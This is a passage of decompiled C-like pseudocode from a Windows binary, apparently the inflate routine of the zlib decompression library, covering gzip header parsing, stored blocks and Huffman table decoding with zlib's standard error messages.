															goto L51;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 4:
												L56:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L65:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x10) = 0;
													}
													goto L67;
												} else {
													L57:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L60:
														__eax = __edi[8];
														__edi[0x10] = __edx;
														__eflags = __eax;
														if(__eax != 0) {
															 *(__eax + 0x14) = __edx;
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															 *(__esp + 0x1c) = __dl;
															__eax = __esp + 0x1c;
															_push(2);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x25) = __dl;
															_push(__edi[6]);
															__eax = E004102D0();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__ecx = 0;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														L67:
														 *__edi = 5;
														goto L68;
													} else {
														while(1) {
															L58:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L59:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L60;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 5:
												L68:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L82:
													__edi[0x10] = 0;
													 *__edi = 6;
													goto L83;
												} else {
													L69:
													__ecx = __edi[0x10];
													 *(__esp + 0x34) = __ecx;
													__eflags = __ecx - __ebp;
													if(__ecx > __ebp) {
														__ecx = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edi[8];
														__eflags = __edx;
														if(__edx != 0) {
															__eax =  *(__edx + 0x10);
															 *(__esp + 0x30) = __eax;
															__eflags = __eax;
															if(__eax != 0) {
																__eax =  *(__edx + 0x14);
																__eax =  *(__edx + 0x14) - __edi[0x10];
																__edx =  *(0x18 + __edx);
																 *(__esp + 0x38) = __eax;
																__eflags = __eax - __edx;
																__eax =  *(__esp + 0x38);
																if(__eflags <= 0) {
																	__edx = __ecx;
																} else {
																	__edx = __edx - __eax;
																}
																__eax = __eax +  *(__esp + 0x30);
																__eflags = __eax;
																__eax = memcpy(__eax, __ebx, __edx);
																__ecx =  *(__esp + 0x40);
																__esp = __esp + 0xc;
															}
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__eax =  *(__esp + 0x34);
														__ebx = __ebx + __eax;
														__ebp = __ebp - __eax;
														 *(__esp + 0x14) = __ebx;
														_t132 =  &(__edi[0x10]);
														 *_t132 = __edi[0x10] - __eax;
														__eflags =  *_t132;
													}
													__eflags = __edi[0x10];
													if(__edi[0x10] != 0) {
														goto L95;
													} else {
														goto L82;
													}
												}
												goto L360;
											case 6:
												L83:
												__eflags = __edi[4] & 0x00000800;
												if((__edi[4] & 0x00000800) == 0) {
													L106:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x1c) = 0;
													}
													goto L108;
												} else {
													L84:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L85:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L86:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x1c);
																__eflags =  *(__eax + 0x1c);
																if( *(__eax + 0x1c) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
																	if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																		__eax =  *(__eax + 0x1c);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t148 =  &(__edi[0x10]);
																		 *_t148 = 1 + __edi[0x10];
																		__eflags =  *_t148;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L91:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L92:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax == 0) {
															L108:
															__edi[0x10] = 0;
															 *__edi = 7;
															goto L109;
														} else {
															goto L95;
														}
													}
												}
												goto L360;
											case 7:
												L109:
												__eflags = __edi[4] & 0x00001000;
												if((__edi[4] & 0x00001000) == 0) {
													L122:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x24) = 0;
													}
													goto L124;
												} else {
													L110:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L111:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L112:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x24);
																__eflags =  *(__eax + 0x24);
																if( *(__eax + 0x24) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
																	if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																		__eax =  *(__eax + 0x24);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t193 =  &(__edi[0x10]);
																		 *_t193 = 1 + __edi[0x10];
																		__eflags =  *_t193;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L117:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L118:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E004102D0();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax != 0) {
															goto L95;
														} else {
															L121:
															L124:
															__edx =  *(__esp + 0x10);
															 *__edi = 8;
															goto L125;
														}
													}
												}
												goto L360;
											case 8:
												L125:
												__eflags = __edi[4] & 0x00000200;
												if((__edi[4] & 0x00000200) == 0) {
													L133:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__edi[4] = __edi[4] >> 9;
														__eax = __edi[4] >> 0x00000009 & 0x00000001;
														__eflags = __eax;
														 *(__ecx + 0x2c) = __eax;
														__eax = __edi[8];
														 *(__edi[8] + 0x30) = 1;
													}
													_push(0);
													_push(0);
													_push(0);
													__eax = E004102D0();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L175;
												} else {
													L126:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L130:
														__eax = __edi[6] & 0x0000ffff;
														__eflags = __edx - __eax;
														if(__edx == __eax) {
															L132:
															__ecx = 0;
															__esi = 0;
															__eflags = 0;
															 *(__esp + 0x10) = 0;
															goto L133;
														} else {
															L131:
															__ecx =  *(__esp + 0x48);
															 *(0x18 + __ecx) = "header crc mismatch";
															 *__edi = 0x1d;
														}
														goto L175;
													} else {
														L127:
														while(1) {
															L128:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L129:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L130;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 9:
												L136:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L139:
													__ecx = __edx;
													__edx = __edx << 0x10;
													__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
													__edx = __edx >> 8;
													__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
													__eax = __edx >> 0x00000008 & 0x0000ff00;
													__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
													__edx = __edx >> 0x18;
													__ecx =  *(__esp + 0x48);
													__eax = __eax + __edx;
													__edx = 0;
													__edi[6] = __eax;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xa;
													goto L140;
												} else {
													while(1) {
														L137:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L138:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L139;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xa:
												L140:
												__eflags = __edi[3];
												if(__edi[3] == 0) {
													L335:
													__eax =  *(__esp + 0x24);
													 *(0xc + __ecx) =  *(__esp + 0x24);
													__eax =  *(__esp + 0x18);
													 *(__ecx + 0x10) =  *(__esp + 0x18);
													__eax = 2;
													 *__ecx = __ebx;
													 *(__ecx + 4) = __ebp;
													__edi[0xf] = __esi;
													_pop(__esi);
													_pop(__ebp);
													_pop(__ebx);
													__edi[0xe] = __edx;
													_pop(__edi);
													__esp = __esp + 0x34;
													return 2;
												} else {
													L141:
													_push(0);
													_push(0);
													_push(0);
													__eax = E00410AD0();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L142;
												}
												goto L360;
											case 0xb:
												L142:
												__eax =  *(__esp + 0x4c);
												__eflags = __eax - 5;
												if(__eax == 5) {
													L342:
													__edi =  *(__esp + 0x10);
													__edx = __eax;
													goto L97;
												} else {
													L143:
													__eflags = __eax - 6;
													if(__eax == 6) {
														goto L342;
													} else {
														goto L144;
													}
												}
												goto L360;
											case 0xc:
												L144:
												__eflags = __edi[1];
												if(__edi[1] == 0) {
													L146:
													__eflags = __esi - 3;
													if(__esi >= 3) {
														L149:
														__eax = __edx;
														__edx = __edx >> 1;
														__edi[1] = __eax;
														__eax = __edx;
														__eax = __edx & 0x00000003;
														__eflags = __eax - 3;
														if(__eax > 3) {
															L152:
															__ecx =  *(__esp + 0x48);
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															goto L175;
														} else {
															L150:
															switch( *((intOrPtr*)(__eax * 4 +  &M0040FEBC))) {
																case 0:
																	L151:
																	 *__edi = 0xd;
																	goto L152;
																case 1:
																	L153:
																	__eflags =  *(__esp + 0x4c) - 6;
																	__edi[0x13] = 0x412738;
																	__edi[0x15] = 9;
																	__edi[0x14] = 0x412f38;
																	__edi[0x16] = 5;
																	 *__edi = 0x13;
																	if( *(__esp + 0x4c) != 6) {
																		goto L152;
																	} else {
																		L154:
																		__edx = __edx >> 2;
																		__esi = __esi - 3;
																		 *(__esp + 0x10) = __edx;
																		goto L95;
																	}
																	goto L360;
																case 2:
																	L155:
																	_t254 = __esp + 0x48; // 0x9
																	__ecx =  *_t254;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *__edi = 0x10;
																	 *(__esp + 0x10) = __edx;
																	goto L175;
																case 3:
																	L156:
																	_t256 = __esp + 0x48; // 0x9
																	__ecx =  *_t256;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *(__esp + 0x10) = __edx;
																	 *(0x18 + __ecx) = "invalid block type";
																	 *__edi = 0x1d;
																	goto L175;
															}
														}
													} else {
														while(1) {
															L147:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L148:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 3;
															if(__esi < 3) {
																continue;
															} else {
																goto L149;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													L145:
													__ecx = __esi;
													 *__edi = 0x1a;
													__ecx = __esi & 0x00000007;
													__edx = __edx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x10) = __edx;
													goto L174;
												}
												goto L360;
											case 0xd:
												L157:
												__esi = __esi & 0x00000007;
												__edx = __edx >> __cl;
												__esi = __esi - (__esi & 0x00000007);
												 *(__esp + 0x10) = __edx;
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L161:
													__eax = __edx;
													__ecx = __edx;
													__eax =  !__edx;
													__ecx = __edx & 0x0000ffff;
													__eax =  !__edx >> 0x10;
													__eflags = __ecx - __eax;
													if(__ecx == __eax) {
														L163:
														__edx = 0;
														__edi[0x10] = __ecx;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														__eflags =  *(__esp + 0x4c) - 6;
														 *__edi = 0xe;
														if( *(__esp + 0x4c) == 6) {
															L341:
															__edi = 0;
															goto L96;
														} else {
															L164:
															__ecx =  *(__esp + 0x48);
															goto L165;
														}
													} else {
														L162:
														__ecx =  *(__esp + 0x48);
														 *(0x18 + __ecx) = "invalid stored block lengths";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													L158:
													while(1) {
														L159:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L160:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L161;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xe:
												L165:
												 *__edi = 0xf;
												goto L166;
											case 0xf:
												L166:
												__eax = __edi[0x10];
												 *(__esp + 0x34) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													L177:
													 *__edi = 0xb;
													goto L175;
												} else {
													L167:
													__eflags = __eax - __ebp;
													if(__eax > __ebp) {
														__eax = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__ecx =  *(__esp + 0x18);
													__eflags = __eax - __ecx;
													if(__eax > __ecx) {
														__eax = __ecx;
														 *(__esp + 0x34) = __eax;
													}
													__eflags = __eax;
													if(__eax == 0) {
														goto L95;
													} else {
														L172:
														__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
														__eax =  *(__esp + 0x40);
														__esp = __esp + 0xc;
														 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
														__ebx = __ebx + __eax;
														 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
														__ebp = __ebp - __eax;
														_t279 =  &(__edi[0x10]);
														 *_t279 = __edi[0x10] - __eax;
														__eflags =  *_t279;
														 *(__esp + 0x14) = __ebx;
														goto L173;
													}
												}
												goto L360;
											case 0x10:
												goto L0;
											case 0x11:
												goto L185;
											case 0x12:
												L197:
												_t908 = _t1063[0x1a];
												 *(_t1104 + 0x34) = _t908;
												__eflags = _t908 - _t1063[0x19] + _t1063[0x18];
												if(_t908 >= _t1063[0x19] + _t1063[0x18]) {
													L233:
													__eflags =  *_t1063 - 0x1d;
													if( *_t1063 == 0x1d) {
														L173:
														_t1014 =  *(_t1104 + 0x10);
														goto L174;
													} else {
														L234:
														__eflags = _t1063[0x9c];
														if(_t1063[0x9c] != 0) {
															L237:
															_t754 =  &(_t1063[0x14c]);
															_t1063[0x15] = 9;
															_t1063[0x13] = _t754;
															_t1063[0x1b] = _t754;
															_t757 = E00410DF0(1,  &(_t1063[0x1c]), _t1063[0x18],  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
															_t1104 = _t1104 + 0x18;
															 *(_t1104 + 0x2c) = _t757;
															__eflags = _t757;
															if(_t757 == 0) {
																L239:
																_t1063[0x14] = _t1063[0x1b];
																_t1063[0x16] = 6;
																_t1029 = E00410DF0(2, _t1063 + (_t1063[0x18] + 0x38) * 2, _t1063[0x19],  &(_t1063[0x1b]),  &(_t1063[0x16]),  &(_t1063[0xbc]));
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x2c) = _t1029;
																__eflags = _t1029;
																if(_t1029 == 0) {
																	L241:
																	_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
																	 *_t1063 = 0x13;
																	__eflags = _t1019 - 6;
																	if(_t1019 == 6) {
																		L340:
																		_t1064 =  *(_t1104 + 0x10);
																		goto L97;
																	} else {
																		L242:
																		_t1030 =  *(_t1104 + 0x10);
																		_t911 =  *(_t1104 + 0x48);
																		goto L243;
																	}
																} else {
																	L240:
																	_t894 =  *(_t1104 + 0x48);
																	_t1014 =  *(_t1104 + 0x10);
																	_t894[6] = "invalid distances set";
																	 *_t1063 = 0x1d;
																	goto L175;
																}
															} else {
																L238:
																_t894 =  *(_t1104 + 0x48);
																_t1014 =  *(_t1104 + 0x10);
																_t894[6] = "invalid literal/lengths set";
																 *_t1063 = 0x1d;
																goto L175;
															}
														} else {
															L235:
															_t894 =  *(_t1104 + 0x48);
															_t1014 =  *(_t1104 + 0x10);
															_t894[6] = "invalid code -- missing end-of-block";
															 *_t1063 = 0x1d;
															goto L175;
														}
													}
												} else {
													L198:
													_t1064 =  *(_t1104 + 0x10);
													do {
														L199:
														_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
														 *(_t1104 + 0x38) = _t832;
														__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
														if((_t832 >> 0x00000008 & 0x000000ff) <= _t1091) {
															L203:
															_t1050 = _t832 >> 0x10;
															__eflags = _t1050 - 0x10;
															if(__eflags >= 0) {
																L205:
																if(__eflags != 0) {
																	L212:
																	__eflags =  *(_t1104 + 0x3a) - 0x11;
																	_t1051 =  *(_t1104 + 0x10);
																	_t991 = _t832 & 0x000000ff;
																	if( *(_t1104 + 0x3a) != 0x11) {
																		L219:
																		_t1089 = _t991 + 7;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1089;
																		if(_t1091 >= _t1089) {
																			L224:
																			_t1052 = _t1051 >> _t991;
																			_t1014 = _t1052 >> 7;
																			__eflags = _t1014;
																			 *(_t1104 + 0x30) = 0xb + (_t1052 & 0x0000007f);
																			_t836 = 0xfffffff9;
																			goto L225;
																		} else {
																			L220:
																			while(1) {
																				L221:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L222:
																				_t844 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t844;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1089;
																				if(_t1091 < _t1089) {
																					continue;
																				} else {
																					L223:
																					_t991 =  *(_t1104 + 0x38);
																					goto L224;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	} else {
																		L213:
																		_t1090 = _t991 + 3;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1090;
																		if(_t1091 >= _t1090) {
																			L218:
																			_t1055 = _t1051 >> _t991;
																			_t1014 = _t1055 >> 3;
																			 *(_t1104 + 0x30) = (_t1055 & 0x00000007) + 3;
																			_t836 = 0xfffffffd;
																			L225:
																			_t1063 =  *(_t1104 + 0x20);
																			_t1091 = _t1091 + _t836 - _t991;
																			__eflags = _t1091;
																			 *(_t1104 + 0x38) = 0;
																			_t838 =  *(_t1104 + 0x30);
																			goto L226;
																		} else {
																			L214:
																			while(1) {
																				L215:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L216:
																				_t849 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t849;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1090;
																				if(_t1091 < _t1090) {
																					continue;
																				} else {
																					L217:
																					_t991 =  *(_t1104 + 0x38);
																					goto L218;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	}
																} else {
																	L206:
																	_t1001 = (_t832 >> 0x00000008 & 0x000000ff) + 2;
																	 *(_t1104 + 0x38) = _t1001;
																	__eflags = _t1091 - _t1001;
																	if(_t1091 >= _t1001) {
																		L210:
																		_t1063 =  *(_t1104 + 0x20);
																		_t1002 = _t832 & 0x000000ff;
																		_t850 =  *(_t1104 + 0x34);
																		_t1091 = _t1091 - _t1002;
																		_t1014 =  *(_t1104 + 0x10) >> _t1002;
																		 *(_t1104 + 0x10) = _t1014;
																		__eflags = _t850;
																		if(_t850 == 0) {
																			L236:
																			_t894 =  *(_t1104 + 0x48);
																			_t894[6] = "invalid bit length repeat";
																			 *_t1063 = 0x1d;
																			goto L175;
																		} else {
																			L211:
																			 *(_t1104 + 0x38) =  *(_t1063 + 0x6e + _t850 * 2) & 0x0000ffff;
																			_t853 = _t1014 & 0x00000003;
																			_t1014 = _t1014 >> 2;
																			_t838 = _t853 + 3;
																			_t1091 = _t1091 - 2;
																			 *(_t1104 + 0x30) = _t838;
																			L226:
																			_t868 =  *(_t1104 + 0x14);
																			 *(_t1104 + 0x10) = _t1014;
																			__eflags = _t838 +  *(_t1104 + 0x34) - _t1063[0x19] + _t1063[0x18];
																			if(_t838 +  *(_t1104 + 0x34) > _t1063[0x19] + _t1063[0x18]) {
																				goto L236;
																			} else {
																				L227:
																				_t994 =  *(_t1104 + 0x30);
																				__eflags = _t994;
																				if(_t994 != 0) {
																					L228:
																					_t1054 =  *(_t1104 + 0x38);
																					do {
																						L229:
																						 *(_t1063 + 0x70 + _t1063[0x1a] * 2) = _t1054;
																						_t1063[0x1a] = 1 + _t1063[0x1a];
																						_t994 = _t994 - 1;
																						__eflags = _t994;
																					} while (_t994 != 0);
																				}
																				L230:
																				_t995 =  *(_t1104 + 0x20);
																				_t1064 =  *(_t1104 + 0x10);
																				goto L231;
																			}
																		}
																	} else {
																		L207:
																		while(1) {
																			L208:
																			__eflags = _t1097;
																			if(_t1097 == 0) {
																				goto L96;
																			}
																			L209:
																			_t1058 = ( *_t868 & 0x000000ff) << _t1091;
																			_t868 =  &(_t868[1]);
																			_t1064 = _t1064 + _t1058;
																			 *(_t1104 + 0x14) = _t868;
																			_t1091 = _t1091 + 8;
																			 *(_t1104 + 0x10) = _t1064;
																			_t1097 = _t1097 - 1;
																			__eflags = _t1091 -  *(_t1104 + 0x38);
																			if(_t1091 <  *(_t1104 + 0x38)) {
																				continue;
																			} else {
																				goto L210;
																			}
																			goto L360;
																		}
																		goto L96;
																	}
																}
															} else {
																L204:
																_t1004 = _t832 >> 0x00000008 & 0x000000ff;
																_t1091 = _t1091 - _t1004;
																_t1064 = _t1064 >> _t1004;
																_t995 =  *(_t1104 + 0x20);
																 *(_t1104 + 0x10) = _t1064;
																 *(_t995 + 0x70 +  *(_t1104 + 0x34) * 2) = _t1050;
																_t995[0x1a] = 1 + _t995[0x1a];
																goto L231;
															}
														} else {
															L200:
															while(1) {
																L201:
																__eflags = _t1097;
																if(_t1097 == 0) {
																	goto L96;
																}
																L202:
																_t1064 = _t1064 + (( *_t868 & 0x000000ff) << _t1091);
																_t868 =  &(_t868[1]);
																_t1091 = _t1091 + 8;
																_t1097 = _t1097 - 1;
																 *(_t1104 + 0x10) = _t1064;
																 *(_t1104 + 0x14) = _t868;
																_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
																 *(_t1104 + 0x38) = _t832;
																__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
																if((_t832 >> 0x00000008 & 0x000000ff) > _t1091) {
																	continue;
																} else {
																	goto L203;
																}
																goto L360;
															}
															goto L96;
														}
														goto L360;
														L231:
														_t1053 = _t995[0x1a];
														 *(_t1104 + 0x34) = _t1053;
														__eflags = _t1053 - _t995[0x19] + _t995[0x18];
													} while (_t1053 < _t995[0x19] + _t995[0x18]);
													_t1063 =  *(_t1104 + 0x20);
													goto L233;
												}
												goto L360;
											case 0x13:
												L243:
												 *_t1063 = 0x14;
												goto L244;
											case 0x14:
												L244:
												__eflags = _t1097 - 6;
												if(_t1097 < 6) {
													L248:
													 *(_t1104 + 0x34) = _t1063[0x13];
													_t1063[0x6f1] = 0;
													_t769 =  *(_t1063[0x13] + ((0x00000001 << _t1063[0x15]) - 0x00000001 & _t1030) * 4);
													__eflags = 0xad - _t1091;
													if(0xad <= _t1091) {
														L251:
														__eflags = _t769;
														if(_t769 == 0) {
															L258:
															_t919 = _t769 >> 0x00000008 & 0x000000ff;
															_t1063[0x6f1] = _t1063[0x6f1] + _t919;
															_t1091 = _t1091 - _t919;
															_t1014 = _t1030 >> _t919;
															 *(_t1104 + 0x10) = _t1014;
															_t1063[0x10] = _t769 >> 0x10;
															__eflags = _t769;
															if(_t769 != 0) {
																L260:
																__eflags = _t769 & 0x00000020;
																if((_t769 & 0x00000020) == 0) {
																	L262:
																	__eflags = _t769 & 0x00000040;
																	if((_t769 & 0x00000040) == 0) {
																		L264:
																		_t771 = _t769 & 0xf;
																		__eflags = _t771;
																		 *_t1063 = 0x15;
																		_t1063[0x12] = _t771;
																		goto L265;
																	} else {
																		L263:
																		_t894 =  *(_t1104 + 0x48);
																		_t894[6] = "invalid literal/length code";
																		 *_t1063 = 0x1d;
																		goto L175;
																	}
																} else {
																	L261:
																	_t1063[0x6f1] = 0xffffffff;
																	 *_t1063 = 0xb;
																	goto L174;
																}
															} else {
																L259:
																 *_t1063 = 0x19;
																goto L174;
															}
														} else {
															L252:
															__eflags = _t769 & 0x000000f0;
															if((_t769 & 0x000000f0) != 0) {
																goto L258;
															} else {
																L253:
																_t964 = _t769 >> 8;
																_t1038 = _t769;
																 *(_t1104 + 0x30) = _t964;
																 *(_t1104 + 0x38) = _t1038;
																_t769 =  *( *(_t1104 + 0x34) + ((((0x00000001 << (_t769 & 0x000000ff) + (_t964 & 0x000000ff)) - 0x00000001 &  *(_t1104 + 0x10)) >> (_t964 & 0x000000ff)) + (_t769 >> 0x10)) * 4);
																__eflags = (_t769 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) - _t1091;
																if((_t769 >> 0x00000008 & 0x000000ff) + ( *(_t1104 + 0x30) & 0x000000ff) <= _t1091) {
																	L257:
																	_t1063 =  *(_t1104 + 0x20);
																	_t868 =  *(_t1104 + 0x14);
																	_t973 = _t1038 & 0x000000ff;
																	_t1030 =  *(_t1104 + 0x10) >> _t973;
																	_t1091 = _t1091 - _t973;
																	__eflags = _t1091;
																	_t1063[0x6f1] = _t973;
																	goto L258;
																} else {
																	L254:
																	while(1) {
																		L255:
																		__eflags = _t1097;
																		if(_t1097 == 0) {
																			goto L95;
																		}
																		L256:
																		_t891 =  *(_t1104 + 0x14);
																		_t974 = _t1091;
																		_t1091 = _t1091 + 8;
																		_t1097 = _t1097 - 1;
																		 *(_t1104 + 0x10) =  *(_t1104 + 0x10) + (( *_t891 & 0x000000ff) << _t974);
																		 *(_t1104 + 0x14) =  &(_t891[1]);
																		_t893 = _t1038 & 0x000000ff;
																		_t769 =  *(( *(_t1104 + 0x20))[0x13] + ((((0x00000001 << (_t1038 & 0x000000ff) + _t893) - 0x00000001 &  *(_t1104 + 0x10)) >> _t893) + ( *(_t1104 + 0x3a) & 0x0000ffff)) * 4);
																		__eflags = (_t769 >> 0x00000008 & 0x000000ff) + _t893 - _t1091;
